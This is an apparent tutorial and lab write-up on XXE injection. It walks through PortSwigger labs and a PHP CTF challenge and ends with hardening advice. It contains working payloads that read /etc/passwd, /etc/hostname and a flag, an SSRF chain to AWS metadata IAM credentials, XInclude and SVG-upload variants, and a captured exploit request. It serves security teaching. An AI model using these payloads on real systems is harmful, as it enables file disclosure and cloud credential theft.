Introduction to XXE: Understanding and Exploiting XML External Entity Vulnerabilities
XML External Entity (XXE) injection is a powerful vulnerability that exploits misconfigured XML processors. When a vulnerable parser is allowed to resolve external entities, attackers can read sensitive files, make the server issue remote requests, and even trigger denial-of-service attacks. This lab teaches the basic principles of internal and external entities in XML and how to exploit them to achieve file disclosure.
Understanding XML External Entity (XXE) Vulnerabilities
XML External Entity (XXE) vulnerabilities arise when an application's XML parser is configured incorrectly or too permissively. This lets an attacker alter the structure of the XML document, leading to disclosure of sensitive information, server-side request forgery (SSRF), or even denial of service (DoS).
XML Fundamentals
- XML (Extensible Markup Language):
XML is a markup language for encoding documents in a format that is both human-readable and machine-readable. Every XML document must be well-formed, which makes its syntax rules stricter than those of HTML. An XML document usually begins with an XML declaration:
<?xml version="1.0" encoding="UTF-8"?>
- XML Declaration:
This statement sets the XML version and encoding.
Document Type Definition (DTD)
DTD:
A DTD is a set of rules that defines the legal building blocks of an XML document. It describes the document structure and specifies the allowed elements and attributes. A DTD can also define entities, which act like variables that hold reusable values.
Example of a simple DTD declaring an internal entity:
<!DOCTYPE note [
<!ENTITY greeting "Hello, World!">
]>
<note>
<message>&greeting;</message>
</note>
In this case, the internal entity greeting is defined as the string “Hello, World!” and is then referenced as &greeting;.
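To watch this substitution happen, here is a minimal Python sketch (Python is our choice for illustration only; the labs do not depend on it). It feeds the same note document to the standard library's xml.etree.ElementTree, which expands internal entities while parsing. The names NOTE_XML and read_message are ours.

```python
import xml.etree.ElementTree as ET

# The same document as above: one internal entity, referenced once.
NOTE_XML = """<!DOCTYPE note [
<!ENTITY greeting "Hello, World!">
]>
<note>
<message>&greeting;</message>
</note>"""


def read_message(xml_text: str) -> str:
    """Parse the document and return the text of its <message> element."""
    root = ET.fromstring(xml_text)
    return root.findtext("message")


print(read_message(NOTE_XML))  # Hello, World!
```

The application code never sees &greeting;, only the substituted value, which is exactly why entity handling matters for security.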
Entities in XML
- Internal Entities:
Internal entities are defined directly in the DTD and are equivalent to their literal value. They are used to avoid repeating strings and to keep values consistent.
<!ENTITY company "Example Corp">
- When referenced (e.g. &company;), the parser replaces it with the exact string “Example Corp”.
- External Entities:
External entities are declared using the SYSTEM or PUBLIC keyword and reference data from an external resource identified by a URI. For instance:
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
Here, the entity xxe pulls in data from /etc/passwd. The URI in an external entity is referred to as the system identifier, which names the source location of the external content.
- Parameter Entities:
These entities are used within DTDs, for example to help define other entities. They are declared with a % sign and can only be referenced inside the DTD. For example:
<!DOCTYPE config [
<!ENTITY % common "CommonConfigValue">
<!ENTITY fullConfig "%common; - Extended">
]>
<config>&fullConfig;</config>
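Parameter entities make DTDs more dynamic and modular, but they also increase the attack surface when misused. Note that the XML specification only permits a parameter-entity reference inside another declaration, as in fullConfig above, when that declaration lives in an external DTD; strict parsers reject it in the internal subset.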
How XXE Works
When an XML parser processes a document, it replaces each entity reference with the entity's value. If an attacker supplies a malicious DTD that declares an external entity pointing to a sensitive file or an attacker-controlled URL, the parser unintentionally inserts that data into the output or performs unintended network requests. This can lead to data disclosure, SSRF, or a DoS condition if the parser is forced to expand a huge amount of data, as in the Billion Laughs attack.
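The amplification behind Billion Laughs is easy to work out. The Python sketch below is an illustration under our own assumptions: the helper names nested_entity_doc and expanded_size are hypothetical, and the tiny depth and width are deliberately harmless. It builds a chain of internal entities where each level references the previous one several times, then compares the parsed size with the predicted one.

```python
import xml.etree.ElementTree as ET


def nested_entity_doc(depth: int, width: int, seed: str = "lol") -> str:
    """Build a document whose entity e<depth> expands to seed * width**depth."""
    decls = [f'<!ENTITY e0 "{seed}">']
    for level in range(1, depth + 1):
        refs = f"&e{level - 1};" * width  # each level repeats the previous one
        decls.append(f'<!ENTITY e{level} "{refs}">')
    return f"<!DOCTYPE bomb [{''.join(decls)}]><bomb>&e{depth};</bomb>"


def expanded_size(depth: int, width: int, seed: str = "lol") -> int:
    """Predicted number of characters after full expansion."""
    return len(seed) * width ** depth


# A harmless instance: 3 levels, 3 references per level.
doc = nested_entity_doc(depth=3, width=3)
text = ET.fromstring(doc).text
print(len(text), expanded_size(3, 3))  # 81 81

# The classic attack uses 9 levels of 10 references each.
print(expanded_size(9, 10))  # 3000000000
```

A document of well under a kilobyte therefore asks the parser for roughly 3 GB of text, which is why parsers that expand entities without limits can be knocked over.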
Core Concepts and XML Structure
XML Structure:
Always inspect POST requests with XML bodies. Look for any place where you can add a DTD that declares your own custom entities.
Document Type Definitions (DTDs):
DTDs specify the structure of the XML document, including entity declarations. Two primary types of entity exist:
Internal Entities: Declared inside the XML document itself, using syntax such as:
<!ENTITY gar "example value">
- Internal entities behave like stored variables and are restricted to local content.
- External Entities: External entities are declared using the SYSTEM keyword, and the resource is specified via a URI such as file:// or http://. For example:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
- External entities make the parser fetch and include content from an external source, at the direction of whoever supplied the DTD.
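Whether that fetch happens depends entirely on the parser's configuration. As a contrast to the vulnerable setups exploited in the labs, the Python sketch below (our own illustration; the function name and the marker file are hypothetical) points an external entity at a temporary file and parses it with xml.etree.ElementTree, which does not resolve external entities.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path


def parse_with_external_entity(target: Path) -> str:
    """Try to pull `target` into a document through an external entity."""
    doc = (
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{target.as_uri()}"> ]>'
        "<data>&xxe;</data>"
    )
    try:
        return ET.fromstring(doc).text or ""
    except ET.ParseError as exc:
        # ElementTree refuses to resolve the external entity.
        return f"parser refused: {exc}"


with tempfile.TemporaryDirectory() as tmp:
    secret = Path(tmp) / "secret.txt"
    secret.write_text("TOP-SECRET-MARKER")
    outcome = parse_with_external_entity(secret)

print(outcome)
```

The marker never appears in the result. A parser configured to resolve external entities would have returned the file's contents instead, and that difference is the whole vulnerability.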
Black Box Testing
Lab 1: Exploiting XXE using external entities to retrieve files
Lab URL - https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files
Step 1: Intercept the XML Request:
This step involves exploring the app and clicking every button. Once we view a product and click the stock check option, we see a POST request whose body is XML, so the server appears to parse XML. Let’s start tinkering with the product.
Step 2: Inject the Malicious DTD:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
Step 3: Calling back the entity and formatting our XML syntax
Now since productId is reflected in the response, let’s call our entity back here. Our final payload should look something like this.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>
&xxe;
</productId><storeId>1</storeId></stockCheck>
With this modified request we solve the lab. Note that if you omit the trailing ; from the entity reference, the XML parser throws an error.
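If you prefer scripting the request over editing it by hand, the steps above can be sketched in Python. This is only a sketch under assumptions: the lab host is a placeholder, the /product/stock path is assumed to match the stock check endpoint, and build_stock_check_request is a hypothetical helper. It builds the request without sending it.

```python
import urllib.request


def build_stock_check_request(lab_url: str, target_uri: str) -> urllib.request.Request:
    """Build (but do not send) the stock check POST carrying the XXE payload."""
    body = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{target_uri}"> ]>\n'
        "<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
    )
    return urllib.request.Request(
        lab_url,
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


# Placeholder host: substitute your own lab instance.
req = build_stock_check_request(
    "https://YOUR-LAB-ID.web-security-academy.net/product/stock",
    "file:///etc/passwd",
)
print(req.get_method(), req.full_url)
print(req.data.decode("utf-8"))
```

Passing the request to urllib.request.urlopen would send it. Since the lab answers an invalid product ID with an error status, expect to read the reflected file contents from the error response.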
Lab 2: Exploiting XXE to perform SSRF attacks
This lab is very simple. In the previous lab we used the file:// protocol; this time we will use the http:// protocol to access internal data. Since this lab is hosted on AWS, we will use the AWS instance metadata IP address, 169.254.169.254. We follow the same steps up to Step 2, where we modify our payload a bit.
Step 2: Our payload should look something like the following.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
We get an error, but worry not: the error message contains the name of the next directory to request.
Our response would look something like the following:
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 28
"Invalid product ID: latest"
Once we append latest to the URL, our modified payload looks like the following:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest"> ]>
Step 3: Keep extending the path until we reach the credentials.
Our final payload should look like the following. The response to it contains the SecretAccessKey in JSON format.
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
Don’t forget to reference the entity. Our final HTTP request body should look something like this, and with it we should be able to solve the lab.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
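The "read the error, extend the path, repeat" loop from Step 2 and Step 3 can be captured in a small helper. The Python sketch below is our own illustration: next_metadata_url is a hypothetical name, and it assumes the response body is a JSON string shaped like the one shown above. It does no networking and only computes the next URL to place in the entity.

```python
import json

ERROR_PREFIX = "Invalid product ID: "


def next_metadata_url(current_url: str, response_body: str) -> str:
    """Append the first directory entry leaked in the error message to the URL."""
    message = json.loads(response_body)
    if not isinstance(message, str) or not message.startswith(ERROR_PREFIX):
        raise ValueError("response does not look like the stock check error")
    entries = message[len(ERROR_PREFIX):].split()
    if not entries:
        raise ValueError("no directory entry found in the error message")
    return current_url.rstrip("/") + "/" + entries[0]


url = next_metadata_url("http://169.254.169.254/", '"Invalid product ID: latest"')
print(url)  # http://169.254.169.254/latest
```

Each new URL goes back into the SYSTEM identifier of the payload, and the cycle continues until the response contains the credentials rather than another directory name.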
Lab 3: Exploiting XInclude to retrieve files
Lab URL - https://portswigger.net/web-security/xxe/lab-xinclude-attack
When to Use XInclude
When standard XXE payloads are blocked by restrictions on entity declarations, or when the application only processes a portion of the XML, XInclude provides an alternative attack vector. The technique adds an XInclude directive to an XML fragment that cannot carry a complete DOCTYPE declaration, which still lets you trigger file inclusion on the backend system.
App Exploration:
We view the shop and click the check stock option. As in the previous labs we see a POST request, but this time there is no XML in the request.
We send this request to Repeater and add our payload. Before that, we tried converting the request to JSON and to XML, which did not work. We also tried referencing empty entities, but for security reasons they do not seem to be enabled.
The Payload Breakdown
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
Our final HTTP request should look something like the following:
POST /product/stock HTTP/2
Host: 0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Cookie: session=sIgSNWBNsJdoh5f2ez8rhpRnlbUCmAGO
Content-Length: 128
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Origin: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aed0068045ca59e80d5eec200a80017.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
&storeId=
Key Components
Root Element <foo>: A basic container element that only supplies structure for our payload and does not need to adhere to any particular schema.
XInclude Namespace Declaration: xmlns:xi="http://www.w3.org/2001/XInclude"
This binds the xi prefix to the official XInclude namespace, so that XML processors recognize the xi:include element as an XInclude directive.
XInclude Element: The core of our exploit:
href="file:///etc/passwd": Names the target file that we want to retrieve from the server's local filesystem.
parse="text": An essential attribute that tells the processor to treat the included content as plain text instead of XML, which avoids parsing errors since /etc/passwd is not valid XML.
Why This Works
Bypasses Traditional XXE Protections: XInclude is handled at the XML processing level rather than the DTD level, so it can bypass restrictions placed on external entities.
Works in Partial XML Contexts: It also works when the application handles only XML snippets or does not let you supply a DOCTYPE.
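To make the mechanism concrete, here is a local Python sketch of XInclude processing. It is an illustration, not the lab's backend: it uses the standard library's xml.etree.ElementInclude, whose default loader opens href as a plain file path rather than a file:// URI, and it reads a temporary file we create ourselves. The function name expand_fragment is ours.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from xml.etree import ElementInclude
from xml.sax.saxutils import quoteattr


def expand_fragment(path: Path) -> str:
    """Process an XInclude fragment (no DOCTYPE at all) that pulls in `path` as text."""
    fragment = (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include parse="text" href={quoteattr(str(path))}/>'
        "</foo>"
    )
    root = ET.fromstring(fragment)
    ElementInclude.include(root)  # replaces xi:include with the file's text
    return root.text or ""


with tempfile.TemporaryDirectory() as tmp:
    target = Path(tmp) / "demo.txt"
    target.write_text("included-file-contents")
    result = expand_fragment(target)

print(result)  # included-file-contents
```

The fragment contains no DOCTYPE and no entity declaration, yet the file's contents end up inside <foo>. That is why blocking DTDs alone does not help once XInclude processing is enabled.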
Lab 4: Exploiting XXE via image file upload
The Vulnerability
SVG files are XML-based, so they can serve as vectors for XML External Entity (XXE) attacks when an upload feature does not defend against them. This section explains how a malicious payload in an SVG avatar can exploit the server.
The Payload Explained
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname" >
]>
<svg width="128px" height="128px"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
Save this payload as an .svg file and upload it in the avatar section, using the choose file option.
Once it is uploaded, go to your comment on the blog and view the image you uploaded. The image should display the hostname. Submit the hostname as the answer to solve the lab.
Breaking Down the Components
XML Declaration: <?xml version="1.0" standalone="yes"?> indicates the XML version and declares the document standalone, i.e., that it does not depend on markup declarations in an external DTD.
DOCTYPE Declaration: Essential part that declares our exploit:
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/hostname" >
]>
This tells the XML parser to fetch the contents of /etc/hostname from the server filesystem and replace every occurrence of &xxe; with it.
SVG Structure and Namespaces:
xmlns="http://www.w3.org/2000/svg" declares the default SVG namespace.
xmlns:xlink="http://www.w3.org/1999/xlink" declares the xlink namespace, which helps keep the file valid as an SVG and ensures proper processing, even though it’s not directly used in our exploit.
- The Attack Vector:
<text font-size="16" x="0" y="16">&xxe;</text> contains the entity reference that will be replaced with the server’s hostname when parsed.
Why This Works
SVG as an XML Trojan Horse: SVG images are XML-based but are typically treated as image content, so they can slip past content filters while carrying an XML attack payload.
Misconfigured XML Parsers: If the server lets its XML parser load external entities (usually a mistake), the parser loads the data from the external file.
Information Disclosure: After processing, the hostname is rendered as text in the SVG “image”, so the information is exfiltrated from the server through the vulnerability.
White Box Testing
Source Code Analysis:
(Location: OrderController.php inside the controllers folder → order() method)
Here’s the problematic code handling XML input:
else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')
{
$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOENT);
if (!$order->food) return 'You need to select a food option first';
return "Your ($order->food) order has been submitted successfully.";
}
The code is vulnerable to an XXE attack for the following reasons:
1. The vulnerability is in the flags: LIBXML_NOENT
The simplexml_load_string() call passes the LIBXML_NOENT flag. Despite its name, this flag tells the XML parser to substitute entities with their values. For example, &amp; becomes &. Combined with external entities, this becomes ammunition for an attacker:
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><food>&xxe;</food></order>
Here &xxe; gets expanded into the contents of /etc/passwd because of LIBXML_NOENT.
2. No Entity Loader Restrictions
The code does not disable PHP’s external entity loader. With entity substitution switched on, the XML parser is free to fetch external resources (such as files or URLs). Because nothing restricts the loader, attackers can read arbitrary files.
3. No Input Validation
The application blindly trusts any XML input. There is no validation to defend against risky constructs such as <!DOCTYPE> or <!ENTITY>.
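One way to add the missing validation is to refuse any document that carries a DOCTYPE before it reaches the real parser. The sketch below shows the idea in Python rather than PHP, purely as an illustration. It uses the standard library's expat bindings, and the names DoctypeForbidden, reject_doctype and is_acceptable are ours.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when the input declares a DOCTYPE."""


def reject_doctype(xml_text: str) -> None:
    """Scan the document and abort as soon as a DOCTYPE declaration starts."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)  # True marks this as the final chunk


def is_acceptable(xml_text: str) -> bool:
    """Accept only well-formed XML without a DOCTYPE."""
    try:
        reject_doctype(xml_text)
    except (DoctypeForbidden, xml.parsers.expat.ExpatError):
        return False
    return True


benign = "<order><food>pizza</food></order>"
malicious = (
    '<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<order><food>&xxe;</food></order>"
)
print(is_acceptable(benign))     # True
print(is_acceptable(malicious))  # False
```

Since an entity can only be declared inside a DOCTYPE, rejecting the DOCTYPE also rules out <!ENTITY> declarations. It does not cover XInclude, which needs to stay disabled separately.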
Exploitation:
First Attempt:
We explore the application and realise that it sends data as JSON. So let’s look up a quick XXE payload to get the flag. We make small tweaks to the payload we find so that it targets the flag.
Final payload :
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY test SYSTEM 'file://flag'>]>
<order><food>&test;</food></order>
But our server responds with the following error message:
{"status":"danger","message":"You need to select a food option first"}
Second Attempt:
Even after changing the JSON data to XML, the web application throws a 400 error. We changed our request using the Content Type Converter plugin, but it seems the header must be exactly Content-Type: application/xml and not Content-Type: application/xml;charset=UTF-8. This matches the strict === comparison in the controller code shown earlier. Our sweet plugin appends charset=UTF-8, which triggers the error.
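The effect of that exact comparison is easy to reproduce. The Python sketch below is an illustration of the logic, not the application's PHP code. strict_match mirrors a byte-for-byte comparison against application/xml, while media_type shows the more forgiving alternative of comparing only the media type and ignoring parameters. Both function names are ours.

```python
def strict_match(content_type: str) -> bool:
    """Mirror an exact string comparison against 'application/xml'."""
    return content_type == "application/xml"


def media_type(content_type: str) -> str:
    """Return only the media type, dropping parameters such as charset."""
    return content_type.split(";", 1)[0].strip().lower()


for header in ("application/xml", "application/xml;charset=UTF-8"):
    print(header, strict_match(header), media_type(header) == "application/xml")
# application/xml True True
# application/xml;charset=UTF-8 False True
```

With the strict check, the XML branch is skipped whenever a charset parameter is present, so the parameter has to be removed from the header by hand before the payload is even parsed.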
Even after fixing the content type we get the following error. Maybe it has something to do with the tags.
You need to select a food option first
Third Attempt:
I got this payload from a walkthrough and realised my mistake: I had not turned the fields of the JSON data into XML tags. It seems the web application only accepts input with a certain structure. Our final payload looks like this:
<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///flag"> ]>
<order>
<table_num>1</table_num>
<food>&ent;</food>
</order>
With this we successfully get our flag.
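The lesson of the third attempt, that every field of the JSON body must reappear as an XML tag, can be sketched as a small converter. This Python sketch rests on assumptions: the JSON body shown is a guess at what the application sends (only the table_num and food tag names come from the payload above), and order_json_to_xxe is a hypothetical helper.

```python
import json
from xml.sax.saxutils import escape


def order_json_to_xxe(json_body: str, inject_field: str, target_uri: str) -> str:
    """Turn each JSON field into an XML tag and place the entity in one of them."""
    fields = json.loads(json_body)
    if inject_field not in fields:
        raise ValueError(f"{inject_field!r} is not a field of the JSON body")
    lines = [
        '<?xml version="1.0" ?>',
        f'<!DOCTYPE replace [<!ENTITY ent SYSTEM "{target_uri}"> ]>',
        "<order>",
    ]
    for name, value in fields.items():
        # The injected field carries the entity reference; others keep their value.
        content = "&ent;" if name == inject_field else escape(str(value))
        lines.append(f"<{name}>{content}</{name}>")
    lines.append("</order>")
    return "\n".join(lines)


# Assumed JSON body: the field values here are placeholders.
payload = order_json_to_xxe('{"table_num": "1", "food": "pizza"}', "food", "file:///flag")
print(payload)
```

The output has the same structure as the final payload above, which is why it succeeds where the first attempt, which lacked the table_num tag, did not.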
Mitigation
Step 1: Remove LIBXML_NOENT
This flag is not needed for many use cases and directly enables entity substitution.
Step 2: Disable External Entities
Add this line before the XML parser is invoked (note that libxml_disable_entity_loader() is deprecated as of PHP 8.0):
libxml_disable_entity_loader(true); // Block external entities
Step 3: Use Safe Parsing Flags
Replace LIBXML_NOENT with LIBXML_NONET to prevent network requests:
$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
Corrected Code snippet
else if ($_SERVER['HTTP_CONTENT_TYPE'] === 'application/xml')
{
libxml_disable_entity_loader(true); // 🔒 CRITICAL FIX
$order = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NONET);
if (!$order->food) return 'Please choose a food first';
return "Your ($order->food) order has been successfully submitted.";
}
We made the following changes to our code:
libxml_disable_entity_loader(true)
- Disables PHP’s ability to load external entities. Even if an attacker injects <!ENTITY>, the parser can’t resolve it.
LIBXML_NONET
- Prevents the parser from making network requests (e.g. to http://internal-server).
No Entity Substitution
- Without LIBXML_NOENT, &xxe; is not substituted.
Note to readers: While this fix looks very appealing, in reality the whole backend broke when we ran Docker to build the web application, because the Alpine edge repository no longer carried PHP 7.
Conclusion: Securing the XML Gateway
XXE vulnerabilities expose a critical flaw in how applications trust and process XML input, one that anyone with malicious intent can abuse. They serve as a reminder that even structured data can be weaponized. From stealing sensitive files to triggering SSRF attacks, XXE demonstrates how a single misconfigured parser can become a gateway for catastrophic breaches.
Key Takeaways:
Parse XML with Caution: XML parsers should be hardened: disable external entities, disable external DTDs where possible, and validate inputs carefully.
Beyond the Obvious: XXE isn’t just about file:// URIs. Methods like XInclude and SVG payloads demonstrate that attackers will find another route when the direct one is blocked.
The Mitigation Myth: While in 2025 it has become easy to spot errors and fix them using AI tools, most production code has many dependencies and may be deployed on Docker images that quickly become outdated. In reality, even with the right fix in hand, we might not be able to run the web application. In our case, the Dockerfile failed because the Alpine edge repository no longer carried PHP 7.
🔐 The secure path forward? Presume every XML document is a threat – until proven otherwise.